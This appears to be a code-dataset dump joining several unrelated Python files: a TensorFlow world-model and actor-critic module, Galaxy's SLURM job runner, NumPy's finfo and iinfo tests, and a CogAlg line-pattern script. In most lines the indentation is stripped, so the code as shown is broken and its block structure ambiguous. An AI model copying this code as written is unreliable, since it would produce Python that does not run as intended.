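    # Example of the uint8 scaling above: pixel 0 -> -0.5, 128 -> ~0.002, 255 -> 0.5,
    # so image observations are roughly zero-centered before entering the encoder.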
@tf.function(experimental_compile=False)
def video_pred(self, data, key, agent=None):
print('data.keys()', data.keys())
vb = self._video_pred_batches
bf = min(self._bootstrap_frames, data['action'].shape[1] - 1)
print("bootstrap_frames:", bf, data['action'].shape[1])
decoder = self.heads['decoder']
truth = data[key][:vb] + 0.5
embed = self.encoder(data)
transformer_embed = self.rssm.transformer_encode(data, tf.zeros_like(embed))
states, _prior, _ = self.rssm.observe(
embed[:vb, :bf],
transformer_embed[:vb, :bf] if transformer_embed is not None else None,
data['image'][:vb, :bf],
data['action'][:vb, :bf],
data['is_first'][:vb, :bf],
training=False,
transformer_weight=True
)
state_feat = self.rssm.get_feat(states)
_prior_feat = self.rssm.get_feat(_prior)
recon = decoder(state_feat)[key].mode()[:vb]
recon_reward = self.heads['reward'](state_feat).mode()[:vb]
recon_discount = self.heads['discount'](state_feat).mode()[:vb]
if self._use_transformer_reward_head:
recon_transformer_reward = self.heads['transformer_reward'](states['t_transformer']).mode()[:vb]
if self._myopic_prediction:
recon_myopic_reward = self.heads['myopic_reward'](states['myopic_out']).mode()[:vb]
prior_recon = decoder(_prior_feat)[key].mode()[:vb]
prior_recon_reward = self.heads['reward'](_prior_feat).mode()[:vb]
prior_recon_discount = self.heads['discount'](_prior_feat).mode()[:vb]
init = {k: v[:, -1] for k, v in states.items()}
prior = self.rssm.imagine(data['action'][:vb, bf:], training=False, state=init, transformer_weight=True)
prior_feat = self.rssm.get_feat(prior)
openl = decoder(prior_feat)[key].mode()
openl_reward = self.heads['reward'](prior_feat).mode()[:vb]
openl_discount = self.heads['discount'](prior_feat).mode()[:vb]
if self._use_transformer_reward_head:
if 't_transformer' in prior:
openl_transformer_reward = self.heads['transformer_reward'](prior['t_transformer']).mode()[:vb]
else:
openl_transformer_reward = tf.zeros_like(openl_reward)
model_transformer_reward = tf.concat([recon_transformer_reward, openl_transformer_reward], 1)
if self._myopic_prediction:
openl_myopic_reward = self.heads['myopic_reward'](prior['myopic_out']).mode()[:vb]
model_myopic_reward = tf.concat([recon_myopic_reward, openl_myopic_reward], 1)
else:
model_myopic_reward = None
model_reward = tf.concat([recon_reward, openl_reward], 1)
model_discount = tf.concat([recon_discount, openl_discount], 1)
model = tf.concat([recon[:, :bf] + 0.5, openl + 0.5], 1)
error = (model - truth + 1) / 2
video = tf.concat([truth, model, error], 2)
prior_video = prior_recon[:, :bf] + 0.5 # [B, T, H, W, C]
B, T, H, W, C = video.shape
actions = data['action'][:vb]
truth_reward = data['reward'][:vb]
truth_discount = data['discount'][:vb]
feat = tf.concat([state_feat, prior_feat], 1)
ret_dict = {
"images": video.transpose((1, 2, 0, 3, 4)).reshape((T, H, B * W, C)),
"prior_images": prior_video,
"rewards": {
"truth": truth_reward,
"model": model_reward,
"prior": prior_recon_reward
},
"discounts": {
"truth": truth_discount,
"model": model_discount,
"prior": prior_recon_discount
},
"actions": actions,
"is_first": data['is_first'][:vb],
"feat": feat,
}
if 'target' in data.keys():
truth_dir = data['target'][:bf]
try:
model_dir = decoder(feat)['target'].mode()
ret_dict['target'] = {
'truth': truth_dir,
'model': model_dir
}
except KeyError:
pass
if self._use_transformer_reward_head:
ret_dict["rewards"]["transformer"] = model_transformer_reward
if self._myopic_prediction:
ret_dict["rewards"]["myopic"] = model_myopic_reward
if self.config.rssm.use_transformer:
ret_dict["transformer_weights"] = dict()
for i in range(self.rssm._transformer.num_layers):
weight_recon = states[f"t_weight_{i}"]
try:
weight_openl = prior[f"t_weight_{i}"]
weight = tf.concat([weight_recon, weight_openl], 1)
except KeyError:
weight = weight_recon
ret_dict["transformer_weights"][i] = weight
if "t_state_weight_0" in states:
ret_dict["state_transformer_weights"] = dict()
for i in range(self.rssm._state_transformer.num_layers):
ret_dict["state_transformer_weights"][i] = states[f"t_state_weight_{i}"]
t_importance = self.calc_t_importance(ret_dict["transformer_weights"][self.rssm._transformer.num_layers - 1][:, :bf],
truth_reward[:, :bf], model_reward[:, :bf], model_transformer_reward[:, :bf], model_myopic_reward[:, :bf] if model_myopic_reward is not None else None,
ret_dict["state_transformer_weights"][self.rssm._state_transformer.num_layers - 1][:, :bf] if "state_transformer_weights" in ret_dict else None)
ret_dict["t_importance"] = t_importance
if self.config.use_inside_transformer:
memory_importance_recon = states["t_importance"]
memory_importance_openl = prior["t_importance"]
memory_importance = tf.concat([memory_importance_recon, memory_importance_openl], 1)
ret_dict["memory_importance"] = memory_importance
if self.config.use_int_reward:
for k, head in self.heads.items():
print("head", k, flush=True)
if k.startswith('int_reward'):
int_reward = head(feat).mode()[:vb]
ret_dict[f'model_{k}'] = int_reward
if agent is not None:
recon_value = agent.critic(self.rssm.get_feat(states)).mode()[:vb]
openl_value = agent.critic(self.rssm.get_feat(prior)).mode()[:vb]
model_value = tf.concat([recon_value, openl_value], 1)
ret_dict["value"] = model_value
return ret_dict
class ActorCritic(common.Module):
def __init__(self, config, step, num_actions):
self.config = config
self.step = step
self.num_actions = num_actions
self.actor = common.MLP(num_actions, **config.actor)
self.critic = common.MLP([], **config.critic)
if config.slow_target:
self._target_critic = common.MLP([], **config.critic)
            self._updates = tf.Variable(0, dtype=tf.int64)  # dtype must be keyword; the second positional arg of tf.Variable is trainable
else:
self._target_critic = self.critic
self.actor_opt = common.Optimizer('actor', **config.actor_opt)
self.critic_opt = common.Optimizer('critic', **config.critic_opt)
self.rewnorm = common.StreamNorm(**self.config.reward_norm)
def train(self, world_model, start, is_terminal, reward_fn):
print("in policy train()", flush=True)
metrics = {}
hor = self.config.imag_horizon
# The weights are is_terminal flags for the imagination start states.
# Technically, they should multiply the losses from the second trajectory
# step onwards, which is the first imagined step. However, we are not
# training the action that led into the first step anyway, so we can use
# them to scale the whole sequence.
with tf.GradientTape() as actor_tape:
seq = world_model.imagine(self.actor, start, is_terminal, hor)
reward = reward_fn(seq)
seq['reward'], mets1 = self.rewnorm(reward)
mets1 = {f'reward_{k}': v for k, v in mets1.items()}
target, mets2 = self.target(seq)
actor_loss, mets3 = self.actor_loss(seq, target)
with tf.GradientTape() as critic_tape:
critic_loss, mets4 = self.critic_loss(seq, target)
metrics.update(self.actor_opt(actor_tape, actor_loss, self.actor))
metrics.update(self.critic_opt(critic_tape, critic_loss, self.critic))
metrics.update(**mets1, **mets2, **mets3, **mets4)
self.update_slow_target() # Variables exist after first forward pass.
print("out policy train()", flush=True)
return metrics
def actor_loss(self, seq, target):
# Actions: 0 [a1] [a2] a3
# ^ | ^ | ^ |
# / v / v / v
# States: [z0]->[z1]-> z2 -> z3
# Targets: t0 [t1] [t2]
# Baselines: [v0] [v1] v2 v3
# Entropies: [e1] [e2]
# Weights: [ 1] [w1] w2 w3
# Loss: l1 l2
metrics = {}
        # Two states are lost at the end of the trajectory, one for the bootstrap
# value prediction and one because the corresponding action does not lead
# anywhere anymore. One target is lost at the start of the trajectory
# because the initial state comes from the replay buffer.
policy = self.actor(tf.stop_gradient(seq['feat'][:-2]))
if self.config.actor_grad == 'dynamics':
objective = target[1:]
elif self.config.actor_grad == 'reinforce':
baseline = self._target_critic(seq['feat'][:-2]).mode()
advantage = tf.stop_gradient(target[1:] - baseline)
objective = policy.log_prob(seq['action'][1:-1]) * advantage
elif self.config.actor_grad == 'both':
baseline = self._target_critic(seq['feat'][:-2]).mode()
advantage = tf.stop_gradient(target[1:] - baseline)
objective = policy.log_prob(seq['action'][1:-1]) * advantage
mix = common.schedule(self.config.actor_grad_mix, self.step)
objective = mix * target[1:] + (1 - mix) * objective
metrics['actor_grad_mix'] = mix
else:
raise NotImplementedError(self.config.actor_grad)
ent = policy.entropy()
ent_scale = common.schedule(self.config.actor_ent, self.step)
objective += ent_scale * ent
weight = tf.stop_gradient(seq['weight'])
actor_loss = -(weight[:-2] * objective).mean()
metrics['actor_ent'] = ent.mean()
metrics['actor_ent_scale'] = ent_scale
return actor_loss, metrics
def critic_loss(self, seq, target):
# States: [z0] [z1] [z2] z3
# Rewards: [r0] [r1] [r2] r3
# Values: [v0] [v1] [v2] v3
# Weights: [ 1] [w1] [w2] w3
# Targets: [t0] [t1] [t2]
# Loss: l0 l1 l2
dist = self.critic(seq['feat'][:-1])
target = tf.stop_gradient(target)
weight = tf.stop_gradient(seq['weight'])
critic_loss = -(dist.log_prob(target) * weight[:-1]).mean()
metrics = {'critic': dist.mode().mean()}
return critic_loss, metrics
def target(self, seq):
# States: [z0] [z1] [z2] [z3]
# Rewards: [r0] [r1] [r2] r3
# Values: [v0] [v1] [v2] [v3]
# Discount: [d0] [d1] [d2] d3
# Targets: t0 t1 t2
reward = tf.cast(seq['reward'], tf.float32)
disc = tf.cast(seq['discount'], tf.float32)
value = self._target_critic(seq['feat']).mode()
# Skipping last time step because it is used for bootstrapping.
target = common.lambda_return(
reward[:-1], value[:-1], disc[:-1],
bootstrap=value[-1],
lambda_=self.config.discount_lambda,
axis=0)
metrics = {}
metrics['critic_slow'] = value.mean()
metrics['critic_target'] = target.mean()
return target, metrics
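    # A sketch of the lambda-return that common.lambda_return is assumed to compute,
    # bootstrapped from the last critic value (which is why that step is skipped):
    #   V_t = r_t + disc_t * ((1 - lambda) * v_{t+1} + lambda * V_{t+1})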
def update_slow_target(self):
if self.config.slow_target:
if self._updates % self.config.slow_target_update == 0:
mix = 1.0 if self._updates == 0 else float(
self.config.slow_target_fraction)
for s, d in zip(self.critic.variables, self._target_critic.variables):
d.assign(mix * s + (1 - mix) * d)
self._updates.assign_add(1)
avg_line_length: 46.787955 | max_line_length: 169 | alphanum_fraction: 0.571574

hexsha: 794d9bde7aed8babf3ac89b5bd55781a3d150d0c | size: 9,660 | ext: py | lang: Python
max_stars_repo_path: lib/galaxy/jobs/runners/slurm.py | max_stars_repo_name: rhpvorderman/galaxy | max_stars_repo_head_hexsha: 178015f8eff0b0c7a59c0d6756658f6428222837 | max_stars_repo_licenses: ["CC-BY-3.0"] | max_stars_count: 1,085 | max_stars_repo_stars_event_min_datetime: 2015-02-18T16:14:38.000Z | max_stars_repo_stars_event_max_datetime: 2022-03-30T23:52:07.000Z
max_issues_repo_path: lib/galaxy/jobs/runners/slurm.py | max_issues_repo_name: rhpvorderman/galaxy | max_issues_repo_head_hexsha: 178015f8eff0b0c7a59c0d6756658f6428222837 | max_issues_repo_licenses: ["CC-BY-3.0"] | max_issues_count: 11,253 | max_issues_repo_issues_event_min_datetime: 2015-02-18T17:47:32.000Z | max_issues_repo_issues_event_max_datetime: 2022-03-31T21:47:03.000Z
max_forks_repo_path: lib/galaxy/jobs/runners/slurm.py | max_forks_repo_name: rhpvorderman/galaxy | max_forks_repo_head_hexsha: 178015f8eff0b0c7a59c0d6756658f6428222837 | max_forks_repo_licenses: ["CC-BY-3.0"] | max_forks_count: 1,000 | max_forks_repo_forks_event_min_datetime: 2015-02-18T16:18:10.000Z | max_forks_repo_forks_event_max_datetime: 2022-03-29T08:22:56.000Z
content:
"""
SLURM job control via the DRMAA API.
"""
import os
import time
from galaxy import model
from galaxy.jobs.runners.drmaa import DRMAAJobRunner
from galaxy.util import commands
from galaxy.util.custom_logging import get_logger
log = get_logger(__name__)
__all__ = ('SlurmJobRunner', )
# Error message printed to job stderr when SLURM itself kills a job.
# See src/common/slurm_jobacct_gather.c and src/slurmd/slurmd/req.c in
# https://github.com/SchedMD/slurm/
SLURM_MEMORY_LIMIT_EXCEEDED_MSG = 'slurmstepd: error: Exceeded job memory limit'
# Warning messages which may be printed to job stderr by SLURM after termination
# of a job step when using the cgroup task plugin. The exceeded memory is not
# always the cause of the step termination, which can be successful.
# See src/plugins/task/cgroup/task_cgroup_memory.c in
# https://github.com/SchedMD/slurm/
SLURM_MEMORY_LIMIT_EXCEEDED_PARTIAL_WARNINGS = [': Exceeded job memory limit at some point.',
': Exceeded step memory limit at some point.']
# These messages are returned to the user
OUT_OF_MEMORY_MSG = 'This job was terminated because it used more memory than it was allocated.'
PROBABLY_OUT_OF_MEMORY_MSG = 'This job was cancelled probably because it used more memory than it was allocated.'
class SlurmJobRunner(DRMAAJobRunner):
runner_name = "SlurmRunner"
restrict_job_name_length = False
def _complete_terminal_job(self, ajs, drmaa_state, **kwargs):
def _get_slurm_state_with_sacct(job_id, cluster):
cmd = ['sacct', '-n', '-o', 'state%-32']
if cluster:
cmd.extend(['-M', cluster])
cmd.extend(['-j', job_id])
try:
stdout = commands.execute(cmd)
except commands.CommandLineException as e:
if e.stderr.strip() == 'SLURM accounting storage is disabled':
log.warning('SLURM accounting storage is not properly configured, unable to run sacct')
return
raise e
# First line is for 'job_id'
# Second line is for 'job_id.batch' (only available after the batch job is complete)
# Following lines are for the steps 'job_id.0', 'job_id.1', ... (but Galaxy does not use steps)
first_line = stdout.splitlines()[0]
# Strip whitespaces and the final '+' (if present), only return the first word
return first_line.strip().rstrip('+').split()[0]
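        # Hypothetical sacct output and the parse above: a first line of
        # 'CANCELLED+   ' -> strip() -> 'CANCELLED+' -> rstrip('+') -> 'CANCELLED'
        # -> split()[0] -> 'CANCELLED'; later lines (job_id.batch, steps) are ignored.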
def _get_slurm_state():
cmd = ['scontrol', '-o']
if '.' in ajs.job_id:
# custom slurm-drmaa-with-cluster-support job id syntax
job_id, cluster = ajs.job_id.split('.', 1)
cmd.extend(['-M', cluster])
else:
job_id = ajs.job_id
cluster = None
cmd.extend(['show', 'job', job_id])
try:
stdout = commands.execute(cmd).strip()
except commands.CommandLineException as e:
if e.stderr == 'slurm_load_jobs error: Invalid job id specified\n':
# The job may be old, try to get its state with sacct
job_state = _get_slurm_state_with_sacct(job_id, cluster)
if job_state:
return job_state
return 'NOT_FOUND'
raise e
# stdout is a single line in format "key1=value1 key2=value2 ..."
job_info_keys = []
job_info_values = []
for job_info in stdout.split():
try:
# Some value may contain `=` (e.g. `StdIn=StdIn=/dev/null`)
k, v = job_info.split('=', 1)
job_info_keys.append(k)
job_info_values.append(v)
except ValueError:
# Some value may contain spaces (e.g. `Comment=** time_limit (60m) min_nodes (1) **`)
job_info_values[-1] += f" {job_info}"
job_info_dict = dict(zip(job_info_keys, job_info_values))
return job_info_dict['JobState']
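        # Hypothetical 'scontrol -o show job <id>' output for the parse above:
        #   'JobId=123 JobName=galaxy_42 JobState=RUNNING Reason=None ...'
        #   -> job_info_dict['JobState'] == 'RUNNING'
        # Values with spaces (e.g. Comment=** time_limit (60m) ... **) are re-joined
        # onto the previous value by the ValueError branch.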
try:
if drmaa_state == self.drmaa_job_states.FAILED:
slurm_state = _get_slurm_state()
sleep = 1
while slurm_state == 'COMPLETING':
log.debug('(%s/%s) Waiting %s seconds for failed job to exit COMPLETING state for post-mortem', ajs.job_wrapper.get_id_tag(), ajs.job_id, sleep)
time.sleep(sleep)
sleep *= 2
if sleep > 64:
ajs.fail_message = "This job failed and the system timed out while trying to determine the cause of the failure."
break
slurm_state = _get_slurm_state()
if slurm_state == 'NOT_FOUND':
log.warning('(%s/%s) Job not found, assuming job check exceeded MinJobAge and completing as successful', ajs.job_wrapper.get_id_tag(), ajs.job_id)
drmaa_state = self.drmaa_job_states.DONE
elif slurm_state == 'COMPLETED':
log.debug("(%s/%s) SLURM reported job success, assuming job check exceeded MinJobAge and completing as successful", ajs.job_wrapper.get_id_tag(), ajs.job_id)
drmaa_state = self.drmaa_job_states.DONE
elif slurm_state == 'TIMEOUT':
log.info('(%s/%s) Job hit walltime', ajs.job_wrapper.get_id_tag(), ajs.job_id)
ajs.fail_message = "This job was terminated because it ran longer than the maximum allowed job run time."
ajs.runner_state = ajs.runner_states.WALLTIME_REACHED
elif slurm_state == 'NODE_FAIL':
log.warning('(%s/%s) Job failed due to node failure, attempting resubmission', ajs.job_wrapper.get_id_tag(), ajs.job_id)
ajs.job_wrapper.change_state(model.Job.states.QUEUED, info='Job was resubmitted due to node failure')
try:
self.queue_job(ajs.job_wrapper)
return
except Exception:
ajs.fail_message = "This job failed due to a cluster node failure, and an attempt to resubmit the job failed."
elif slurm_state == 'OUT_OF_MEMORY':
log.info('(%s/%s) Job hit memory limit (SLURM state: OUT_OF_MEMORY)', ajs.job_wrapper.get_id_tag(), ajs.job_id)
ajs.fail_message = OUT_OF_MEMORY_MSG
ajs.runner_state = ajs.runner_states.MEMORY_LIMIT_REACHED
elif slurm_state == 'CANCELLED':
# Check to see if the job was killed for exceeding memory consumption
check_memory_limit_msg = self.__check_memory_limit(ajs.error_file)
if check_memory_limit_msg:
log.info('(%s/%s) Job hit memory limit (SLURM state: CANCELLED)', ajs.job_wrapper.get_id_tag(), ajs.job_id)
ajs.fail_message = check_memory_limit_msg
ajs.runner_state = ajs.runner_states.MEMORY_LIMIT_REACHED
else:
log.info('(%s/%s) Job was cancelled via SLURM (e.g. with scancel(1))', ajs.job_wrapper.get_id_tag(), ajs.job_id)
ajs.fail_message = "This job failed because it was cancelled by an administrator."
elif slurm_state in ('PENDING', 'RUNNING'):
log.warning('(%s/%s) Job was reported by drmaa as terminal but job state in SLURM is: %s, returning to monitor queue', ajs.job_wrapper.get_id_tag(), ajs.job_id, slurm_state)
return True
else:
log.warning('(%s/%s) Job failed due to unknown reasons, job state in SLURM was: %s', ajs.job_wrapper.get_id_tag(), ajs.job_id, slurm_state)
ajs.fail_message = "This job failed for reasons that could not be determined."
if drmaa_state == self.drmaa_job_states.FAILED:
ajs.fail_message += '\nPlease click the bug icon to report this problem if you need help.'
ajs.stop_job = False
self.work_queue.put((self.fail_job, ajs))
return
except Exception:
log.exception('(%s/%s) Failure in SLURM _complete_terminal_job(), job final state will be: %s', ajs.job_wrapper.get_id_tag(), ajs.job_id, drmaa_state)
# by default, finish the job with the state from drmaa
return super()._complete_terminal_job(ajs, drmaa_state=drmaa_state)
def __check_memory_limit(self, efile_path):
"""
A very poor implementation of tail, but it doesn't need to be fancy
since we are only searching the last 2K
"""
try:
log.debug('Checking %s for exceeded memory message from SLURM', efile_path)
with open(efile_path) as f:
if os.path.getsize(efile_path) > 2048:
f.seek(-2048, os.SEEK_END)
f.readline()
for line in f.readlines():
stripped_line = line.strip()
if stripped_line == SLURM_MEMORY_LIMIT_EXCEEDED_MSG:
return OUT_OF_MEMORY_MSG
elif any(_ in stripped_line for _ in SLURM_MEMORY_LIMIT_EXCEEDED_PARTIAL_WARNINGS):
return PROBABLY_OUT_OF_MEMORY_MSG
except Exception:
log.exception('Error reading end of %s:', efile_path)
return False
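    # Sketch of the "tail" above: for an error file larger than 2048 bytes, seek to
    # EOF-2048 and discard the first (likely partial) line, so only complete lines
    # from the last ~2K are compared against the SLURM memory-limit messages.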
avg_line_length: 55.83815 | max_line_length: 193 | alphanum_fraction: 0.591615

hexsha: 794d9d0b70f1a2757c266d5e88687961d25c58d4 | size: 2,753 | ext: py | lang: Python
max_stars_repo_path: numpy/core/tests/test_getlimits.py | max_stars_repo_name: ivanov/numpy | max_stars_repo_head_hexsha: 6d2665626e40f346bb5af8d780579f5a429ff9ba | max_stars_repo_licenses: ["BSD-3-Clause"] | max_stars_count: null | max_stars_repo_stars_event_min_datetime: null | max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: numpy/core/tests/test_getlimits.py | max_issues_repo_name: ivanov/numpy | max_issues_repo_head_hexsha: 6d2665626e40f346bb5af8d780579f5a429ff9ba | max_issues_repo_licenses: ["BSD-3-Clause"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: numpy/core/tests/test_getlimits.py | max_forks_repo_name: ivanov/numpy | max_forks_repo_head_hexsha: 6d2665626e40f346bb5af8d780579f5a429ff9ba | max_forks_repo_licenses: ["BSD-3-Clause"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
""" Test functions for limits module.
"""
from __future__ import division, absolute_import
from numpy.testing import *
from numpy.core import finfo, iinfo
from numpy import half, single, double, longdouble
import numpy as np
##################################################
class TestPythonFloat(TestCase):
def test_singleton(self):
ftype = finfo(float)
ftype2 = finfo(float)
assert_equal(id(ftype),id(ftype2))
class TestHalf(TestCase):
def test_singleton(self):
ftype = finfo(half)
ftype2 = finfo(half)
assert_equal(id(ftype),id(ftype2))
class TestSingle(TestCase):
def test_singleton(self):
ftype = finfo(single)
ftype2 = finfo(single)
assert_equal(id(ftype),id(ftype2))
class TestDouble(TestCase):
def test_singleton(self):
ftype = finfo(double)
ftype2 = finfo(double)
assert_equal(id(ftype),id(ftype2))
class TestLongdouble(TestCase):
def test_singleton(self,level=2):
ftype = finfo(longdouble)
ftype2 = finfo(longdouble)
assert_equal(id(ftype),id(ftype2))
class TestIinfo(TestCase):
def test_basic(self):
dts = zip(['i1', 'i2', 'i4', 'i8',
'u1', 'u2', 'u4', 'u8'],
[np.int8, np.int16, np.int32, np.int64,
np.uint8, np.uint16, np.uint32, np.uint64])
for dt1, dt2 in dts:
assert_equal(iinfo(dt1).min, iinfo(dt2).min)
assert_equal(iinfo(dt1).max, iinfo(dt2).max)
self.assertRaises(ValueError, iinfo, 'f4')
def test_unsigned_max(self):
types = np.sctypes['uint']
for T in types:
assert_equal(iinfo(T).max, T(-1))
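    # Why T(-1) equals the max: unsigned construction wraps modulo 2**nbits, e.g.
    # np.uint8(-1) == 255 == iinfo(np.uint8).max (holds on the numpy versions this
    # test targets; newer numpy may warn or reject negative unsigned construction).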
class TestRepr(TestCase):
def test_iinfo_repr(self):
expected = "iinfo(min=-32768, max=32767, dtype=int16)"
assert_equal(repr(np.iinfo(np.int16)), expected)
def test_finfo_repr(self):
expected = "finfo(resolution=1e-06, min=-3.4028235e+38," + \
" max=3.4028235e+38, dtype=float32)"
# Python 2.5 float formatting on Windows adds an extra 0 to the
# exponent. So test for both. Once 2.5 compatibility is dropped, this
# can simply use `assert_equal(repr(np.finfo(np.float32)), expected)`.
expected_win25 = "finfo(resolution=1e-006, min=-3.4028235e+038," + \
" max=3.4028235e+038, dtype=float32)"
actual = repr(np.finfo(np.float32))
if not actual == expected:
if not actual == expected_win25:
                msg = build_err_msg([actual, expected], verbose=True)
raise AssertionError(msg)
def test_instances():
iinfo(10)
finfo(3.0)
if __name__ == "__main__":
run_module_suite()
avg_line_length: 31.643678 | max_line_length: 79 | alphanum_fraction: 0.602615

hexsha: 794d9d330e0dc89959942d07451cc052151dad54 | size: 15,826 | ext: py | lang: Python
max_stars_repo_path: line_1D_alg/alternative versions/line_patterns_dict.py | max_stars_repo_name: vishalbelsare/CogAlg | max_stars_repo_head_hexsha: ec54406be2f68c3ccb07bef13fc486d097784c49 | max_stars_repo_licenses: ["MIT"] | max_stars_count: 102 | max_stars_repo_stars_event_min_datetime: 2016-10-09T01:33:00.000Z | max_stars_repo_stars_event_max_datetime: 2022-01-28T01:03:23.000Z
max_issues_repo_path: line_1D_alg/alternative versions/line_patterns_dict.py | max_issues_repo_name: alex-pitertsev/CogAlg | max_issues_repo_head_hexsha: 23542710a172fccdcdccdca37e354283dd9f57bf | max_issues_repo_licenses: ["MIT"] | max_issues_count: 41 | max_issues_repo_issues_event_min_datetime: 2017-06-04T16:09:43.000Z | max_issues_repo_issues_event_max_datetime: 2022-01-20T21:11:42.000Z
max_forks_repo_path: line_1D_alg/alternative versions/line_patterns_dict.py | max_forks_repo_name: alex-pitertsev/CogAlg | max_forks_repo_head_hexsha: 23542710a172fccdcdccdca37e354283dd9f57bf | max_forks_repo_licenses: ["MIT"] | max_forks_count: 50 | max_forks_repo_forks_event_min_datetime: 2017-05-10T06:25:36.000Z | max_forks_repo_forks_event_max_datetime: 2021-08-02T20:28:54.000Z
content:
'''
line_patterns using dicts vs. classes, Kelvin's port
'''
# add ColAlg folder to system path
import sys
from os.path import dirname, join, abspath
sys.path.insert(0, abspath(join(dirname("CogAlg"), '../..')))
import cv2
import matplotlib.pyplot as plt  # needed for the render branch in __main__ below
import csv
import argparse
from time import time
from utils import *
from itertools import zip_longest
from frame_2D_alg.class_cluster import setdict_attr, NoneType, comp_param
ave = 15 # |difference| between pixels that coincides with average value of Pm
ave_min = 2 # for m defined as min |d|: smaller?
ave_M = 50 # min M for initial incremental-range comparison(t_), higher cost than der_comp?
ave_D = 5 # min |D| for initial incremental-derivation comparison(d_)
ave_nP = 5 # average number of sub_Ps in P, to estimate intra-costs? ave_rdn_inc = 1 + 1 / ave_nP # 1.2
ave_rdm = .5 # obsolete: average dm / m, to project bi_m = m * 1.5
ave_merge = 50 # to merge a kernel of 3 adjacent Ps
init_y = 0 # starting row, the whole frame doesn't need to be processed
'''
Conventions:
postfix '_' denotes array name, vs. same-name elements
prefix '_' denotes prior of two same-name variables
prefix 'f' denotes flag
capitalized variables are normally summed small-case variables
'''
def cross_comp(frame_of_pixels_): # converts frame_of_pixels to frame_of_patterns, each pattern may be nested
Y, X = frame_of_pixels_.shape # Y: frame height, X: frame width
frame_of_patterns_ = []
'''
if cross_comp_spliced: process all image rows as a single line, vertically consecutive and preserving horizontal direction:
pixel_=[]; dert_=[]
for y in range(init_y + 1, Y):
pixel_.append([ frame_of_pixels_[y, :]]) # splice all rows into pixel_
_i = pixel_[0]
else:
'''
    for y in range(init_y + 1, Y): # y is index of new line pixel_; a break point here, we only need one row to process
# initialization:
dert_ = [] # line-wide i_, p_, d_, m__
pixel_ = frame_of_pixels_[y, :]
_i = pixel_[0]
# pixel i is compared to prior pixel _i in a row:
for i in pixel_[1:]:
d = i -_i
p = i +_i
m = ave - abs(d) # for consistency with deriv_comp output, otherwise redundant
dert_.append({'i':i,'p':p,'d':d,'m':m})
_i = i
# form m Patterns, evaluate intra_Pm_ per Pm:
Pm_ = form_P_(dert_, rdn=1, rng=1, fPd=False)
# add line of patterns to frame of patterns:
frame_of_patterns_.append(Pm_) # skip if cross_comp_spliced
    return frame_of_patterns_ # frame of patterns is an input to level 2
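# Worked example of the pixel cross-comparison above (pixels hypothetical, ave = 15):
#   pixel_ = [10, 12, 9]
#   i=12, _i=10 -> d=2,  p=22, m=15-|2|=13
#   i=9,  _i=12 -> d=-3, p=21, m=15-|-3|=12
# so a row of N pixels yields N-1 derts feeding form_P_.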
def form_P_(dert_, rdn, rng, fPd): # accumulation and termination
# initialization:
P_ = []
x = 0
_sign = None # to initialize 1st P, (None != True) and (None != False) are both True
for dert in dert_: # segment by sign
if fPd: sign = dert['d'] > 0
else: sign = dert['m'] > 0
if sign != _sign:
# sign change, initialize and append P
P = {'sign':_sign, 'L':1, 'I':dert['p'], 'D':dert['d'], 'M':dert['m'], 'x0':x, 'dert_':[dert], 'sublayers':[], 'fPd':fPd}
P_.append(P) # still updated with accumulation below
else:
# accumulate params:
P['L'] += 1; P['I'] += dert['p']; P['D'] += dert['d']; P['M'] += dert['m']
P['dert_'] += [dert]
x += 1
_sign = sign
if len(P_) > 4:
#P_ = splice_P_(P_, fPd=0) # merge meanI- or meanD- similar and weakly separated Ps
#if len(P_) > 4:
intra_Pm_(P_, rdn, rng, not fPd) # evaluates range_comp | deriv_comp sub-recursion per Pm
'''
with open("frame_of_patterns_2.csv", "a") as csvFile: # current layer visualization
write = csv.writer(csvFile, delimiter=",")
for item in range(len(P_)):
# print(P_[item].L, P_[item].I, P_[item].D, P_[item].M, P_[item].x0)
write.writerow([P_[item].L, P_[item].I, P_[item].D, P_[item].M, P_[item].x0])
'''
return P_
'''
Sub-recursion in intra_P extends pattern with sub_: hierarchy of sub-patterns, to be adjusted by macro-feedback:
'''
def intra_Pm_(P_, rdn, rng, fPd): # evaluate for sub-recursion in line Pm_, pack results into sub_Pm_
adj_M_ = form_adjacent_M_(P_) # compute adjacent Ms to evaluate contrastive borrow potential
comb_layers = [] # combine into root P sublayers[1:]
for P, adj_M in zip(P_, adj_M_): # each sub_layer is nested to depth = sublayers[n]
if P['L'] > 2 ** (rng+1): # rng+1 because rng is initialized at 0, as all params
if P['M'] > 0: # low-variation span, eval comp at rng=2^n: 1, 2, 3; kernel size 2, 4, 8...
if P['M'] - adj_M > ave_M * rdn: # reduced by lending to contrast: all comps form params for hLe comp?
'''
if localized filters:
P_ave = (P.M - adj_M) / P.L
loc_ave = (ave - P_ave) / 2 # ave is reduced because it's for inverse deviation, possibly negative?
loc_ave_min = (ave_min + P_ave) / 2
rdert_ = range_comp(P.dert_, loc_ave, loc_ave_min, fid)
'''
rdert_ = range_comp(P['dert_']) # rng+ comp with localized ave, skip predictable next dert
rdn += 1; rng += 1
sub_Pm_ = form_P_(rdert_, rdn, rng, fPd=False) # cluster by m sign, eval intra_Pm_
Ls = len(sub_Pm_)
P['sublayers'] += [[(Ls, False, fPd, rdn, rng, sub_Pm_)]] # add Dert=[] if Ls > min?
# 1st sublayer is single-element, packed in double brackets only to allow nesting for deeper sublayers
if len(sub_Pm_) > 4:
P['sublayers'] += intra_Pm_(sub_Pm_, rdn+1 + 1/Ls, rng+1, fPd) # feedback
# add param summation within sublayer, for comp_sublayers?
# splice sublayers across sub_Ps:
comb_layers = [comb_layers + sublayers for comb_layers, sublayers in
zip_longest(comb_layers, P['sublayers'], fillvalue=[])]
else: # neg Pm: high-variation span, min neg M is contrast value, borrowed from adjacent +Pms:
if min(-P['M'], adj_M) > ave_D * rdn: # cancelled M+ val, M = min | ~v_SAD
rel_adj_M = adj_M / -P['M'] # for allocation of -Pm' adj_M to each of its internal Pds
sub_Pd_ = form_P_(P['dert_'], rdn+1, rng, fPd=True) # cluster by d sign: partial d match, eval intra_Pm_(Pdm_)
Ls = len(sub_Pd_)
P['sublayers'] += [[(Ls, True, True, rdn, rng, sub_Pd_)]] # 1st layer, Dert=[], fill if Ls > min?
P['sublayers'] += intra_Pd_(sub_Pd_, rel_adj_M, rdn+1 + 1/Ls, rng) # der_comp eval per nPm
# splice sublayers across sub_Ps, for return as root sublayers[1:]:
